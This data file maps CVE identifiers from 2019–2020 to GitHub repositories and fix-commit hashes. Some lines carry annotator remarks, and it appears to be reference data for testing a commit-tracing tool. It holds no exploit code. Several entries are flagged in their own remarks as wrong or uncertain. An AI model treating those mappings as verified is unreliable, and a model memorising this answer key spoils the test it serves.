-CVE-2019-14262;https://github.com/drewnoakes/metadata-extractor-dotnet;None:None;False;c9a8a9ac4376725084bd7c3c11af50c74cf58d44,3142e5e6a95f2760ace1d2fdd9d50a97eb1c0e23; -CVE-2019-14280;https://github.com/craftcms/cms;None:None;False;7e7b9756da942d70b930a5e9a8ea4767f3920d00,a3844e019bbc3c67a2f9ba581a758d785efa9e26; -CVE-2019-14537;https://github.com/YOURLS/YOURLS;None:None;False;9e36c67b01b932a41f0834d7896c7ba8383e9f07; -CVE-2019-14540;https://github.com/FasterXML/jackson-databind;None:None;False;d4983c740fec7d5576b207a8c30a63d3ea7443de; -CVE-2019-14668;https://github.com/firefly-iii/firefly-iii;None:None;False;3ad4e04e2ae50e60564b60b68dfac083e5684882; -CVE-2019-14669;https://github.com/firefly-iii/firefly-iii;None:None;False;2ddf48f15cbdbb475221c299872420f625c3bc3f; -CVE-2019-14671;https://github.com/firefly-iii/firefly-iii;None:None;False;e80d616ef4397e6e764f6b7b7a5b30121244933c; -CVE-2019-14672;https://github.com/firefly-iii/firefly-iii;None:None;False;8717f469b10e9f7e1547c6f70f7d24e1359d28d4; -CVE-2019-14751;https://github.com/nltk/nltk;None:None;False;f59d7ed8df2e0e957f7f247fe218032abdbe9a10; -CVE-2019-14806;https://github.com/pallets/werkzeug;None:None;False;00bc43b1672e662e5e3b8cecd79e67fc968fa246; -CVE-2019-14837;https://github.com/keycloak/keycloak;None:None;False;9a7c1a91a59ab85e7f8889a505be04a71580777f; -CVE-2019-14838;https://github.com/wildfly/wildfly-core;None:None;False;2d527803dc10add8806fa0dd66f409dc511f92ec,131fa6880ae1523fac9e96df54dc394b63b0eed3,80e18b46f73f9d061d4150c66e6dc2fc1fd0bc41; had to look for tags manually (commits have no tags) -CVE-2019-14862;https://github.com/knockout/knockout;None:None;False;7e280b2b8a04cc19176b5171263a5c68bda98efb; -CVE-2019-14863;https://github.com/angular/angular.js;None:None;False;f33ce173c90736e349cf594df717ae3ee41e0f7a; -CVE-2019-14892;https://github.com/FasterXML/jackson-databind;None:None;False;819cdbcab51c6da9fb896380f2d46e9b7d4fdc3b,41b7f9b90149e9d44a65a8261a8deedc7186f6af; -CVE-2019-14893;https://github.com/FasterXML/jackson-databind;None:None;False;998efd708284778f29d83d7962a9bd935c228317; -CVE-2019-14933;https://github.com/bagisto/bagisto;None:None;False;6a4cb016c4b1fa218c86b19b944fe88cab89c82d,747f2147396acb5e9477431e6847a7cf82e62614,e88bf10c55ee6ad89c0a81ad539ca9695aaa9999,09d6afc72aa055a389139f14e3d643927cea7501,61fd02ed576c4588dd72757da8e59fe1697a76e9,1e6579bedff68ab22f9160c2f4a0b7f4cbc9de60,d8d645eb4122a951ac89c3cbe6086b33a4707a2a,8cfcf3d4844bbc58623c02fab6da9bb1a1d619d3,6c74b2ca4269ac62f051d0a5a50a3ec8070c988c,c7482f576ec79b3c03119239b35c8b4c75a8e0a3,5c94a8a21fb0c79886975e4c489eecc131a9939f,1033bd8d315c47b95042a16b5b3b79fb17a796e5,82e56334c29d40ae66b9f74415962d8cdec86fcd,2df1a84191eb0cb67c5514e4fbbe936ef6883067,dadbf2bd6aa32c66a74028643c72a9e71b7fc314; -CVE-2019-14980;https://github.com/ImageMagick/ImageMagick;None:None;False;c5d012a46ae22be9444326aa37969a3f75daa3ba; -CVE-2019-15062;https://github.com/Dolibarr/dolibarr;None:None;False;18eb2a83fe7c2d01bdb34cceec389a6f9541e1f6,9692ea5faf2ef69bec7328feda1a23092ce55143,d21e5571007d2052a6b5f80a67b6f4cac693584a; vulnerable tag is fixed -CVE-2019-15477;https://github.com/jooby-project/jooby;None:None;False;27b4af283de1a2c2a6b0530039b46eef75ddf655,34856a738829d8fedca4ed27bd6ff413af87186f,395dab7e80474ac0c2c32d81f61cda2c8331a46b; -CVE-2019-15481;https://github.com/kevinpapst/kimai2;None:None;False;a0e8aa3a435717187fb12210242dab1b7c97ff3f; -CVE-2019-15482;https://github.com/SLMNBJ/selectize-plugin-a11y;None:None;False;99c14f7644fdfc815625d7b54829e6c2dca31a8b,927d81e9ea86acac1724d57b2ce9f3c962fd34c4; -CVE-2019-15483;https://github.com/bolt/bolt;None:None;False;7910ea8443377bf661ac49a80015eb25f69cdfd5,45780faa7ee5263a5a5ca4cfe102830ef244b06a; -CVE-2019-15484;https://github.com/bolt/bolt;None:None;False;2634a56c0db25a6a7e917a78ab8f9fc430f03a51,520c4578acfd0193b08cabd924598e6dd0edf98f; -CVE-2019-15485;https://github.com/bolt/bolt;None:None;False;1ef623734b555fc5dbcd6d735cf2ecf8b2d22cd1,bd7e9393f24ef162e354b28b82b85d1865d6c0e8; -CVE-2019-15486;https://github.com/ierror/django-js-reverse;None:None;False;a3b57d1e4424e2fadabcd526d170c4868d55159c,78d6aff2276f2d341f643b095515f8aaba5e67c2; -CVE-2019-15532;https://github.com/gchq/CyberChef;None:None;False;01f0625d6a177f9c5df9281f12a27c814c2d8bcf; -CVE-2019-15587;https://github.com/flavorjones/loofah;None:None;False;0c6617af440879ce97440f6eb6c58636456dc8ec,e323a776dd2755a837a67895eaa3cdae44495254; wrong cve id in linked issue... -CVE-2019-15599;https://github.com/pkrumins/node-tree-kill;None:None;False;ff73dbf144c4c2daa67799a50dfff59cd455c63c,deee138a8cbc918463d8af5ce8c2bec33c3fd164; -CVE-2019-15608;https://github.com/yarnpkg/yarn;None:None;False;34efd23305b9da701aae96f29302b71a5a0ea2e6,fa746451eeae79ec35e87bbec14576d6831984fe; -CVE-2019-15657;https://github.com/mysticatea/eslint-utils;None:None;False;08158db1c98fd71cf0f32ddefbc147e2620e724c; -CVE-2019-15658;https://github.com/voxpelli/node-connect-pg-simple;None:None;False;df61c9507f804ba72803e4f567c3cbcfa0a9d7e1; -CVE-2019-15782;https://github.com/webtorrent/webtorrent;None:None;False;7e829b5d52c32d2e6d8f5fbcf0f8f418fffde083,22546df6d9ba9ca4523142d98b5e70f6db213f3e,cdf1159cc0227b1f85c4a52263cbd33bc4ed5242,9029557ca3d22faef67315f8ed33df295ce6d59e; -CVE-2019-16060;https://github.com/airbrake/airbrake-ruby;None:None;False;d29925e7838031bf7dea7016b22de52532503796,45b1306590c345ed798f3290d32eb1deb38b9945; -CVE-2019-16097;https://github.com/goharbor/harbor;None:None;False;290da4dc7bd11532800c13cfa125b300231f76f4,1559c8ccd19ac6bd128d2cc91c4cc0b3ac4b35a2,7d151946e0e2d2b23ddb8f6ca2d16a9413acf7d9,b6db8a8a106259ec9a2c48be8a380cb3b37cf517; -CVE-2019-16145;https://github.com/padrino/padrino-contrib;None:None;False;85e087ef40cbc3c6244d5301b6d7da63ba1ade20,662616162265a74da5a35b55c10f85d8168fc635; commit has no tags, the commits appear in zero tags so we filter them out -CVE-2019-16197;https://github.com/Dolibarr/dolibarr;None:None;False;cabbdfc650a1f2b4f0fe04bf29bab0b3cfc2ee63; -CVE-2019-16317;https://github.com/pimcore/pimcore;None:None;False;6ee5d8536d0802e377594cbe39083e822710aab9; -CVE-2019-16318;https://github.com/pimcore/pimcore;None:None;False;732f1647cc6e0a29b5b1f5d904b4d726b5e9455f; -CVE-2019-16335;https://github.com/FasterXML/jackson-databind;None:None;False;73c1c2cc76e6cdd7f3a5615cbe3207fe96e4d3db; -CVE-2019-16403;https://github.com/bagisto/bagisto;None:None;False;4a2efc8eee0b8cc2ce807288f06a843c8e10701b,06aa4dd6bf1569ec2f76fe49fb4cf177e24539e0,40ebb3a0c43ca8754ff5be46afdeb298ee91bd95; fixed version is vulnerable -CVE-2019-16676;https://github.com/heartcombo/simple_form;None:None;False;8c91bd76a5052ddf3e3ab9fd8333f9aa7b2e2dd6; -CVE-2019-16761;https://github.com/simpleledger/slp-validate.js;None:None;False;50ad96c2798dad6b9f9a13333dd05232defe5730; -CVE-2019-16762;https://github.com/simpleledger/slpjs;None:None;False;ac8809b42e47790a6f0205991b36f2699ed10c84; -CVE-2019-16763;https://github.com/mpetroff/pannellum;None:None;False;cc2f3d99953de59db908e0c6efd1c2c17f7c6914; -CVE-2019-16766;https://github.com/labd/wagtail-2fa;None:None;False;a6711b29711729005770ff481b22675b35ff5c81; -CVE-2019-16768;https://github.com/Sylius/Sylius;None:None;False;fd43ee5321668c0777aa2c023a88a613bd2b2d58,8b68ff784d16930c86266b0ab93d06ba9fd12a19,19b2fe4a6cdb2186489221ea8b5e5628c8223286,51dd1fe1a97b116507d1651591f91413411f1a86,e9bd800c25ed4a4f3580054df7019e965c57c4f5; -CVE-2019-16769;https://github.com/yahoo/serialize-javascript;None:None;False;16a68ab53d9626fc7c942b48a1163108fcd184c8; -CVE-2019-16770;https://github.com/puma/puma;None:None;False;98a1f03e5ebe40cf56b65b0bf60adf97057e0eaf,6baa4d8e1c88f2e4db2918df48416a5c49feec40,06053e60908074bb38293d4449ea261cb009b53e; -CVE-2019-16771;https://github.com/line/armeria;None:None;False;b597f7a865a527a84ee3d6937075cfbb4470ed20; -CVE-2019-16772;https://github.com/commenthol/serialize-to-js;None:None;False;181d7d583ae5293cd47cc99b14ad13352875f3e3,d0234d3a3cea6edaeb2c22df0d359164967234a2; -CVE-2019-16774;https://github.com/PHPSocialNetwork/phpfastcache;None:None;False;82a84adff6e8fc9b564c616d0fdc9238ae2e86c3,c4527205cb7a402b595790c74310791f5b04a1a4,34d680b18e79e9d7f0874a5a06d23371dc326b26,17f77676adfe1e0b24a139dcaa0586d283fbfcef; -CVE-2019-16778;https://github.com/tensorflow/tensorflow;None:None;False;db4f9717c41bccc3ce10099ab61996b246099892; -CVE-2019-16779;https://github.com/excon/excon;None:None;False;ccb57d7a422f020dc74f1de4e8fb505ab46d8a29; -CVE-2019-16782;https://github.com/rack/rack;None:None;False;7fecaee81f59926b6e1913511c90650e76673b38,3232f9370d099e784a16c01d32e8a2da4a953f18,15da2e5d95228d0b3fcdb38b2a562efc333402f0,1a532d13eee9d5546349b5253a204187773de151,b9565a90eea77960e552e3c86b0adb83ab034726,368effdbeca7955f4e46ea51bfb2d647bc79aa6b,d49aa811d6c8fe109c7fc5ca9bddb3d9f7eba796,3e9cb660cc8bf9543b134b6f3ca35aadfe4e0611,442dba2362558e4a7a3e39d437b95d81f2479b31,3ab0277cd129f15059662451718048bcf23cb5d1,7237b6661ad98c1dac6ad799192262697e1a3559,511f809e80c3264af3a26d485a5137ac28f08ebe,5b1cab667270d7ad1a4d2088adf5ff4eb9845496,1e96e0f197777458216bb3dfdbcce57a0bbba0c5,3ba123d278f1085ba78fc000df954e507af2d622,dc45a06b339c707c1f658c123ec7216151878f7a,73a5f79f6854eed81ecc3e5fb9f8154e967ccc49,4e322629e0c6698c75a3fb541a42571f8543c34c,1c7e3b259f0741c869dcfbabeb3e0670c4d3f848,2b205ed5a047d9e50a13bb7a411bc48745b515ec,bb3d486644755b2e0c7824b3910db1a83c98fcd2,77f3aab73089abe518f62c46268b104bacd7114b,83d4bd12c7e88455d21230bc24ec3a543654e2aa; -CVE-2019-16784;https://github.com/pyinstaller/pyinstaller;None:None;False;42a67148b3bdf9211fda8499fdc5b63acdd7e6cc; -CVE-2019-16785;https://github.com/Pylons/waitress;None:None;False;8eba394ad75deaf9e5cd15b78a3d16b12e6b0eba; -CVE-2019-16786;https://github.com/Pylons/waitress;None:None;False;f11093a6b3240fc26830b6111e826128af7771c3; -CVE-2019-16789;https://github.com/Pylons/waitress;None:None;False;11d9e138125ad46e951027184b13242a3c1de017; -CVE-2019-16792;https://github.com/Pylons/waitress;None:None;False;575994cd42e83fd772a5f7ec98b2c56751bd3f65; -CVE-2019-16869;https://github.com/netty/netty;None:None;False;39cafcb05c99f2aa9fce7e6597664c9ed6a63a95,017a9658c97ff1a1355c31a6a1f8bd1ea6f21c8d; -CVE-2019-16884;https://github.com/opencontainers/runc;None:None;False;3e425f80a8c931f88e6d94a8c831b9d5aa481657,331692baa7afdf6c186f8667cb0e6362ea0802b3; -CVE-2019-16942;https://github.com/FasterXML/jackson-databind;None:None;False;328a0f833daf6baa443ac3b37c818a0204714b0b,54aa38d87dcffa5ccc23e64922e9536c82c1b9c8,9593e16cf5a3d289a9c584f7123639655de9ddac; -CVE-2019-16943;https://github.com/FasterXML/jackson-databind;None:None;False;328a0f833daf6baa443ac3b37c818a0204714b0b,54aa38d87dcffa5ccc23e64922e9536c82c1b9c8,9593e16cf5a3d289a9c584f7123639655de9ddac; -CVE-2019-17206;https://github.com/frostming/rediswrapper;None:None;False;2751f6ff86e3f90c9e14b8b8acc8ef02c86987e1,f24212589b568c9f9ae11d4bf504f42303b341d5,748f60bafd857c24f65683426f665350e2c3f91b; -CVE-2019-17223;https://github.com/Dolibarr/dolibarr;None:None;False;c7736dde41826ac6eca3e838e57eab2f0304e256,8645fd8946eab2d2edb39ba7a3cf59282fa8b994; commit has no tags -CVE-2019-17267;https://github.com/FasterXML/jackson-databind;None:None;False;191a4cdf87b56d2ddddb77edd895ee756b7f75eb; -CVE-2019-17359;https://github.com/bcgit/bc-java;None:None;False;33a8e4aa07b21a8bcf5a582446664485f5f081b2,b1bc75254f5fea633a49a751a1a7339056f97856; -CVE-2019-17383;https://github.com/dspinhirne/netaddr-rb;None:None;False;3aac46c00a36e71905eaa619cb94d45bff6e3b51,f9639bd6e1d920cc46ff56ec11981536cb371c6b; -CVE-2019-17426;https://github.com/Automattic/mongoose;None:None;False;f3eca5b94d822225c04e96cbeed9f095afb3c31c,f88eb2524b65a68ff893c90a03c04f0913c1913e; -CVE-2019-17496;https://github.com/craftcms/cms;None:None;False;0ee66d29281af2b6c4f866e1437842c61983a672; -CVE-2019-17513;https://github.com/ratpack/ratpack;None:None;False;efb910d38a96494256f36675ef0e5061097dd77d; -CVE-2019-17531;https://github.com/FasterXML/jackson-databind;None:None;False;b5a304a98590b6bb766134f9261e6566dcbbb6d0; -CVE-2019-17541;https://github.com/ImageMagick/ImageMagick;None:None;False;39f226a9c137f547e12afde972eeba7551124493; -CVE-2019-17554;https://github.com/apache/olingo-odata4;None:None;False;c3f982db3d97e395d313ae8f231202bb2139882c,5948974ad28271818e2afe747c71cde56a7f2c63; -CVE-2019-17563;https://github.com/apache/tomcat;None:None;False;e19a202ee43b6e2a538be5515ae0ab32d8ef112c,1ecba14e690cf5f3f143eef6ae7037a6d3c16652,ab72a106fe5d992abddda954e30849d7cf8cc583; -CVE-2019-17569;https://github.com/apache/tomcat;None:None;False;b191a0d9cf06f4e04257c221bfe41d2b108a9cc8,959f1dfd767bf3cb64776b44f7395d1d8d8f7ab3,3c295d913e1d82ce25b4ad66c800313994f4e530,060ecc5eb839208687b7fcc9e35287ac8eb46998; -CVE-2019-17592;https://github.com/adaltas/node-csv-parse;None:None;False;b9d35940c6815cdf1dfd6b21857a1f6d0fd51e4a; -CVE-2019-17632;https://github.com/eclipse/jetty.project;None:None;False;cf0df6e3ffdcd64d607a35488edb5b0b75350d33,ba1fe2826d49c52f82b49bb32737a361519c0479,9e40fc9a6fbe93850233b7f03f048b1272530942; another case of "introduced by" on debian security tracker -CVE-2019-18622;https://github.com/phpmyadmin/phpmyadmin;None:None;False;ff541af95d7155d8dd326f331b5e248fea8e7111; -CVE-2019-18656;https://github.com/pimcore/pimcore;None:None;False;ca036e9f86bb5cdb3dac0930ec131e5f35e26c5f; -CVE-2019-18841;https://github.com/ankane/chartkick.js;None:None;False;3f833c2b229db140295b44074fef56428e0a8b91,b810936bbf687bc74c5b6dba72d2397a399885fa; -CVE-2019-18848;https://github.com/nov/json-jwt;None:None;False;ada16e772906efdd035e3df49cb2ae372f0f948a; -CVE-2019-18857;https://github.com/darylldoyle/svg-sanitizer;None:None;False;51ca4b713f3706d6b27769c6296bbc0c28a5bbd0; -CVE-2019-18874;https://github.com/giampaolo/psutil;None:None;False;7d512c8e4442a896d56505be3e78f1156f443465; -CVE-2019-18886;https://github.com/symfony/symfony;None:None;False;7bd4a92fc9cc15d9a9fbb9eb1041e01b977f8332,3ae3094a18a649d00d12e025da36007b5931b8d0,5ac07633314f59033dd6f975c199da2822b37533,bcfc282d42798860ac6a81c062ee6ff2ce65c80f; introduced by, but it should find also the second -CVE-2019-18887;https://github.com/symfony/symfony;None:None;False;d41bd42ad5d51e0f4d24259ec2814ccb294c3ba2,cccefe6a7f12e776df0665aeb77fe9294c285fbb,010213408e61620eb21ba5e5ef3bfba14a4ff689; -CVE-2019-18888;https://github.com/symfony/symfony;None:None;False;0b2c3a43bcedb2ae23970a78e17f81eccbbe1661,b21025b139962bfb87501b40ec43e7c3e4801435,691486e43ce0e4893cd703e221bafc10a871f365,77ddabf2e785ea85860d2720cc86f7c5d8967ed5,6be5cc75a4817657c5574553a41bdd0193d4fe51,2dfc115f6dd56fcc12a6941e8050349cc4d04dbe; -CVE-2019-18889;https://github.com/symfony/cache;None:None;False;8d5db9c0cecf8b6f79fa96583fae652224d897da; -CVE-2019-18923;https://github.com/cactus/go-camo;None:None;False;c1a5f28e28dd0b276269fe18ce1d4b794aa70655,add2d78c67fcfb9f2e78f38be35e85cf1858794d; -CVE-2019-18954;https://github.com/NetEase/pomelo;None:None;False;e0de00abf82e3306a53afc547fe0539f26fb152d,5b999c56c7244e23e5003878402a3c54ab51ed8c; -CVE-2019-18978;https://github.com/cyu/rack-cors;None:None;False;e4d4fc362a4315808927011cbe5afcfe5486f17d; -CVE-2019-18981;https://github.com/pimcore/pimcore;None:None;False;0a5d80b2593b2ebe35d19756b730ba33aa049106; -CVE-2019-18982;https://github.com/pimcore/pimcore;None:None;False;e0b48faf7d29ce43a98825a0b230e88350ebcf78; -CVE-2019-18985;https://github.com/pimcore/pimcore;None:None;False;9f2d075243a8392c114d9a8028858b9faf041e2d; -CVE-2019-18986;https://github.com/pimcore/pimcore;None:None;False;4a7bba5c3f818852cbbd29fa124f7fb09a207185; -CVE-2019-19010;https://github.com/ProgVal/Limnoria;None:None;False;3848ae78de45b35c029cc333963d436b9d2f0a35; -CVE-2019-19118;https://github.com/django/django;None:None;False;11c5e0609bcc0db93809de2a08e0dc3d70b393e4,36f580a17f0b3cb087deadf3b65eea024f479c21,103ebe2b5ff1b2614b85a52c239f471904d26244,092cd66cf3c3e175acce698d6ca2012068d878fa; -CVE-2019-19212;https://github.com/Dolibarr/dolibarr;None:None;False;6431e8e16d8ca778d222097a51c927a0526c8101; was 10.0.3:10.0.4 -CVE-2019-19274;https://github.com/python/typed_ast;None:None;False;156afcb26c198e162504a57caddfe0acd9ed7dce,dc317ac9cff859aa84eeabe03fb5004982545b3b; -CVE-2019-19275;https://github.com/python/typed_ast;None:None;False;dc317ac9cff859aa84eeabe03fb5004982545b3b; -CVE-2019-19316;https://github.com/hashicorp/terraform;None:None;False;6db3cf8e5b4cfb2a3cd1d99a813b50b2d5d363bb; commit is outside the time interval -CVE-2019-19325;https://github.com/silverstripe/silverstripe-framework;None:None;False;ad1b00ec7dc1589a05bfc7f5f8207489797ef714,49fda52b12ba59f0a04bcabf78425586a8779e89; -CVE-2019-19507;https://github.com/manvel-khnkoyan/jpv;None:None;False;fdab85599fd92aea87af35fb4c52ba26ccbdd427; -CVE-2019-19576;https://github.com/getk2/k2;None:None;False;d1344706c4b74c2ae7659b286b5a066117155124; -CVE-2019-19619;https://github.com/documize/community;None:None;False;a4384210d4d0d6b18e6fdb7e155de96d4a1cf9f3; -CVE-2019-19687;https://github.com/openstack/keystone;None:None;False;17c337dbdbfb9d548ad531c2ad0483c9bce5b98f; -CVE-2019-19703;https://github.com/ktorio/ktor;None:None;False;0c108156f45423d09014b47be810188629cb878f; -CVE-2019-19794;https://github.com/miekg/dns;None:None;False;8ebf2e419df7857ac8919baa05248789a8ffbf33; -CVE-2019-19844;https://github.com/django/django;None:None;False;f4cff43bf921fcea6a29b726eb66767f67753fa2,4d334bea06cac63dc1272abcec545b85136cca0e,302a4ff1e8b1c798aab97673909c7a3dfda42c26,5b1fbcef7a8bec991ebe7b2a18b5d5a95d72cb70; -CVE-2019-19919;https://github.com/handlebars-lang/handlebars.js;None:None;False;2078c727c627f25d4a149962f05c1e069beb18bc,213c0bbe3c4bd83a534d67384e5afa0000347ff6; -CVE-2019-20330;https://github.com/FasterXML/jackson-databind;None:None;False;fc4214a883dc087070f25da738ef0d49c2f3387e; -CVE-2019-20444;https://github.com/netty/netty;None:None;False;745814b382e828c344aeff2ab4fd9530fbb7cdfe,a7c18d44b46e02dadfe3da225a06e5091f5f328e; -CVE-2019-1000005;https://github.com/mpdf/mpdf;None:None;False;20ff6399433c18233f31817ba2f35a86dd9d5e22; commit is outside the time interval -CVE-2019-1000007;https://github.com/horazont/aioxmpp;None:None;False;f151f920f439d97d4103fc11057ed6dc34fe98be,29ff0838a40f58efe30a4bbcea95aa8dab7da475; -CVE-2019-1000021;https://github.com/poezio/slixmpp;None:None;False;7cd73b594e8122dddf847953fcfc85ab4d316416; -CVE-2019-1002101;https://github.com/kubernetes/kubernetes;None:None;False;47063891dd782835170f500a83f37cc98c3c1013,ee7edb77659902afbe2f7b872159cf9f952a8e23,b18e16e5ca330fccaef34798cabf64fd9f23409b,c14a780d3af9f3b66e561ce0d7380e18e8fa1bf9,185dec7f90110c29353dac4609684470349f4b6e,38a3162748adb2ca733fd4de9558fc77f60cfa8e,972b75de1377aff7a5cdba82ac4c86fdd32da07b,2f9ad66eaca587e516d5edd5edd070efc118b31f; introduced by... -CVE-2019-1010142;https://github.com/secdev/scapy;None:None;False;0d7ae2b039f650a40e511d09eb961c782da025d9,905c80d6ed435477224c53de8850f763b04d495d; -CVE-2019-1010266;https://github.com/lodash/lodash;None:None;False;5c08f18d365b64063bfbfa686cbb97cdd6267347; -CVE-2019-1010306;https://github.com/stevegraham/slanger;None:None;False;f26f80c675dc4d853bce401743779a6959981af1,5267b455caeb2e055cccf0d2b6a22727c111f5c3; -CVE-2019-1020012;https://github.com/parse-community/parse-server;None:None;False;8709daf698ea69b59268cb66f0f7cee75b52daa5; -CVE-2020-1747;https://github.com/yaml/pyyaml;None:None;False;5080ba513377b6355a0502104846ee804656f1e0; -CVE-2020-1928;https://github.com/apache/nifi;None:None;False;34f2a592df8996b5f9e65039a35ecd8c31417fbd; -CVE-2020-1935;https://github.com/apache/tomcat;None:None;False;702bf15bea292915684d931526d95d4990b2e73d,ae8c82eff96990878e79691819ae941538ee62fd,8fbe2e962f0ea138d92361921643fe5abe0c4f56,8bfb0ff7f25fe7555a5eb2f7984f73546c11aa26,b191a0d9cf06f4e04257c221bfe41d2b108a9cc8,959f1dfd767bf3cb64776b44f7395d1d8d8f7ab3,060ecc5eb839208687b7fcc9e35287ac8eb46998; last three not correct from tracer -CVE-2020-1937;https://github.com/apache/kylin;None:None;False;e373c64c96a54a7abfe4bccb82e8feb60db04749,1f9f44ceb818b46518176e81c6dea5a0d12750cf; -CVE-2020-1938;https://github.com/apache/tomcat;None:None;False;f7180bafc74cb1250c9e9287b68a230f0e1f4645,0f725b323a74b64cdb35fce04b54427582ad6063,15cd78c528425c693f1d2b51057f32d3d63d360a,b99fba5bd796d876ea536e83299603443842feba,0d633e72ebc7b3c242d0081c23bba5e4dacd9b72,bd5ebb63e438a253bbd9b035425ece915d3feb21,4c933d80e340b4a841a672060351b2190b326782; -CVE-2020-1940;https://github.com/apache/jackrabbit-oak;None:None;False;9b78a60d5d0c3e199c006d92590dc29d39379679,756d0387ef39dc3a7a84f6644a318e74535953e6,b615992fc5202046e9479a29d6a7bd41d6258d09,3e1c6e13b67331710a1747223d8e6ee22c5fae9c,21a47b758bb24b1327c795cf421dc755f7959d2f,e7180a8d9c4f14b2de1928861dd27287e5fb59bd,138318257a57703ef6dd0f7430c115f41ffe8f85; -CVE-2020-5215;https://github.com/tensorflow/tensorflow;None:None;False;5ac1b9e24ff6afc465756edf845d2e9660bd34bf,c6170fb37c65556fda58a014d8a3235ad75f1cfc,7dc97c2704f49f20719facd1f9983c114b0b451b,e7201bae4a618ce14d4b6e11ef47fa38d7f3ffb3,54a06baa1cf13bd7057c5ce372c90f6bbe1cbc57; -CVE-2020-5219;https://github.com/peerigon/angular-expressions;None:None;False;061addfb9a9e932a970e5fcb913d020038e65667; -CVE-2020-5223;https://github.com/PrivateBin/PrivateBin;None:None;False;2caddf985f35c6b660b19ff62bb9ddd2d9f33118,4bf7f863dc2ffea1ea105e575205ab0f83ed2751,8d0ac336d23cd8c98e71d5f21cdadcae9c8a26e6; -CVE-2020-5224;https://github.com/jazzband/django-user-sessions;None:None;False;f0c4077e7d1436ba6d721af85cee89222ca5d2d9; -CVE-2020-5227;https://github.com/lkiesow/python-feedgen;None:None;False;f57a01b20fa4aaaeccfa417f28e66b4084b9d0cf; -CVE-2020-5229;https://github.com/opencast/opencast;None:None;False;32bfbe5f78e214e2d589f92050228b91d704758e; -CVE-2020-5230;https://github.com/opencast/opencast;None:None;False;cd15f4017d9dc2836f5ffbdeeb115607501b7e97,bbb473f34ab95497d6c432c81285efb0c739f317; -CVE-2020-5232;https://github.com/ensdomains/ens;None:None;False;36e10e71fcddcade88646821e0a57cc6c19e1ecf; -CVE-2020-5233;https://github.com/oauth2-proxy/oauth2-proxy;None:None;False;0198dd6e9378405c432810e190288d796da46e4d,a316f8a06f3c0ca2b5fc5fa18a91781b313607b2; -CVE-2020-5236;https://github.com/Pylons/waitress;None:None;False;6e46f9e3f014d64dd7d1e258eaf626e39870ee1f; -CVE-2020-5237;https://github.com/1up-lab/OneupUploaderBundle;None:None;False;a6011449b716f163fe1ae323053077e59212350c,d59fcd2e5f675ee83c53965e16d21a942e90a9ef; -CVE-2020-5243;https://github.com/ua-parser/uap-core;None:None;False;0afd61ed85396a3b5316f18bfd1edfaadf8e88e1,a679b131697e7371f0441f4799940779efa2f27e,dd279cff09546dbd4174bd05d29c0e90c2cffa7c,7d92a383440c9742ec878273c90a4dcf8446f9af,e9a1c74dae9ecd4aa6385bd34ef6c7243f89b537; -CVE-2020-5245;https://github.com/dropwizard/dropwizard;None:None;False;d87d1e4f8e20f6494c0232bf8560c961b46db634,28479f743a9d0aab6d0e963fc07f3dd98e8c8236; -CVE-2020-5247;https://github.com/puma/puma;None:None;False;c36491756f68a9d6a8b3a49e7e5eb07fe6f1332f,694feafcd4fdcea786a0730701dad933f7547bea,1b17e85a06183cd169b41ca719928c26d44a6e03; -CVE-2020-5249;https://github.com/puma/puma;None:None;False;c22712fc93284a45a93f9ad7023888f3a65524f3; -CVE-2020-5310;https://github.com/python-pillow/Pillow;None:None;False;4e2def2539ec13e53a82e06c4b3daf00454100c4,b9c68540dc7091c644860a7ed31ec4b79dd9363e; -CVE-2020-5311;https://github.com/python-pillow/Pillow;None:None;False;be44f0d9923485f3ed3a7a9fd479cf8cf69d814a,a79b65c47c7dc6fe623aadf09aa6192fc54548f3; -CVE-2020-5312;https://github.com/python-pillow/Pillow;None:None;False;8f0c8f731190f761180bed827d07b7a740d8555b,93b22b846e0269ee9594ff71a72bec02d2bea8fd; -CVE-2020-5313;https://github.com/python-pillow/Pillow;None:None;False;c40bc258472c83168a997a9bf4e4b5934397774a,a09acd0decd8a87ccce939d5ff65dab59e7d365b; -CVE-2020-5390;https://github.com/IdentityPython/pysaml2;None:None;False;5e9d5acbcd8ae45c4e736ac521fd2df5b1c62e25; -CVE-2020-5398;https://github.com/spring-projects/spring-framework;None:None;False;6ce19ff86138a9dd284588fb62c73af5bc97ec66,0583b334b46cf2a591c72c2708ee3d2ac5d2b58c,41f40c6c229d3b4f768718f1ec229d8f0ad76d76,956ffe68587c8d5f21135b5ce4650af0c2dea933; -CVE-2020-5529;https://github.com/HtmlUnit/htmlunit;None:None;False;934390fefcd2cd58e6d86f2bc19d811ae17bfa28; -CVE-2020-6802;https://github.com/mozilla/bleach;None:None;False;f77e0f6392177a06e46a49abd61a4d9f035e57fd,996cde7a2439a2323f9c4b2567c8b8449d393351; -CVE-2020-6816;https://github.com/mozilla/bleach;None:None;False;175f67740e7951e1d80cefb7831e6c3e4efeb986,e4e9e21e7aebff40c88fafa4319bba4636a602d9; -CVE-2020-6836;https://github.com/handsontable/formula-parser;None:None;False;396b089738d4bf30eb570a4fe6a188affa95cd5e; -CVE-2020-7212;https://github.com/urllib3/urllib3;None:None;False;a74c9cfbaed9f811e7563cfc3dce894928e0221a,a2697e7c6b275f05879b60f593c5854a816489f0; -CVE-2020-7219;https://github.com/hashicorp/consul;None:None;False;b788f729e9653d4a81691cbccedca2a2ac06f5ea,5531678e9eb7c5548df8fa86e9e77a573c233e46; Version mismatch, re run -CVE-2020-7596;https://github.com/codecov/codecov-node;None:None;False;f429409922cc52d0684f6e8f897363b363ed04cd,2f4eff90dd21e58dd56074dc4933b15a91373de6; -CVE-2020-7597;https://github.com/codecov/codecov-node;None:None;False;02cf13d8b93ac547b5b4c2cfe186b7d874fd234f; -CVE-2020-7598;https://github.com/minimistjs/minimist;None:None;False;38a4d1caead72ef99e824bb420a2528eec03d9ab,63e7ed05aa4b1889ec2f3b196426db4500cbda94; This repo was wrong (not existant). I expect it to not find anything -CVE-2020-7608;https://github.com/yargs/yargs-parser;None:None;False;63810ca1ae1a24b08293a4d971e70e058c7a41e2,6e36df108cd8ed6443c4d4a4536b55b6e9552b3d,c893d3072f7d31243b750b1d599b0826b8aaefa4; -CVE-2020-7981;https://github.com/alexreisner/geocoder;None:None;False;dcdc3d8675411edce3965941a2ca7c441ca48613; -CVE-2020-8116;https://github.com/sindresorhus/dot-prop;None:None;False;3039c8c07f6fdaa8b595ec869ae0895686a7a0f2,c914124f418f55edea27928e89c94d931babe587; -CVE-2020-8125;https://github.com/lukeed/klona;None:None;False;200e8d1fd383a54790ee6fc8228264c21954e38e; -CVE-2020-8131;https://github.com/yarnpkg/yarn;None:None;False;0e7133ca28618513503b4e1d9063f1c18ea318e5; 